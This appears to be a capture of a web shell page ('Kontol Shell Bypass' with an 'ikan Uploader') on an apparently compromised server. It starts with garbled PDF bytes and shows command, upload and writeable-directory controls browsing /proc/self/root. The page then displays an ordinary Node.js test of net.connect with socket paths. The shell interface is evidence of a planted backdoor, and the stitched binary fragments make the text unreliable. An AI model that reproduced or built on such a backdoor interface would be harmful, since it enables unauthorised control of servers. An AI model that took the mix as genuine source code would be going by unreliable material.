%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/test-net-connect-options-path.js
'use strict';
const common = require('../common');
const net = require('net');

// This file tests the option handling of net.connect,
// net.createConnect, and new Socket().connect

const tmpdir = require('../common/tmpdir');
tmpdir.refresh();

const CLIENT_VARIANTS = 12;

// Test connect(path)
{
  const prefix = `${common.PIPE}-net-connect-options-path`;
  const serverPath = `${prefix}-server`;
  let counter = 0;
  const server = net.createServer()
  .on('connection', common.mustCall(function(socket) {
    socket.end('ok');
  }, CLIENT_VARIANTS))
  .listen(serverPath, common.mustCall(function() {
    const getConnectCb = () => common.mustCall(function() {
      this.end();
      this.on('close', common.mustCall(function() {
        counter++;
        if (counter === CLIENT_VARIANTS) {
          server.close();
        }
      }));
    });

    // CLIENT_VARIANTS depends on the following code
    net.connect(serverPath, getConnectCb()).resume();
    net.connect(serverPath)
      .on('connect', getConnectCb())
      .resume();
    net.createConnection(serverPath, getConnectCb()).resume();
    net.createConnection(serverPath)
      .on('connect', getConnectCb())
      .resume();
    new net.Socket().connect(serverPath, getConnectCb()).resume();
    new net.Socket().connect(serverPath)
      .on('connect', getConnectCb())
      .resume();
    net.connect({ path: serverPath }, getConnectCb()).resume();
    net.connect({ path: serverPath })
      .on('connect', getConnectCb())
      .resume();
    net.createConnection({ path: serverPath }, getConnectCb()).resume();
    net.createConnection({ path: serverPath })
      .on('connect', getConnectCb())
      .resume();
    new net.Socket().connect({ path: serverPath }, getConnectCb()).resume();
    new net.Socket().connect({ path: serverPath })
      .on('connect', getConnectCb())
      .resume();
  }));
}

Kontol Shell Bypass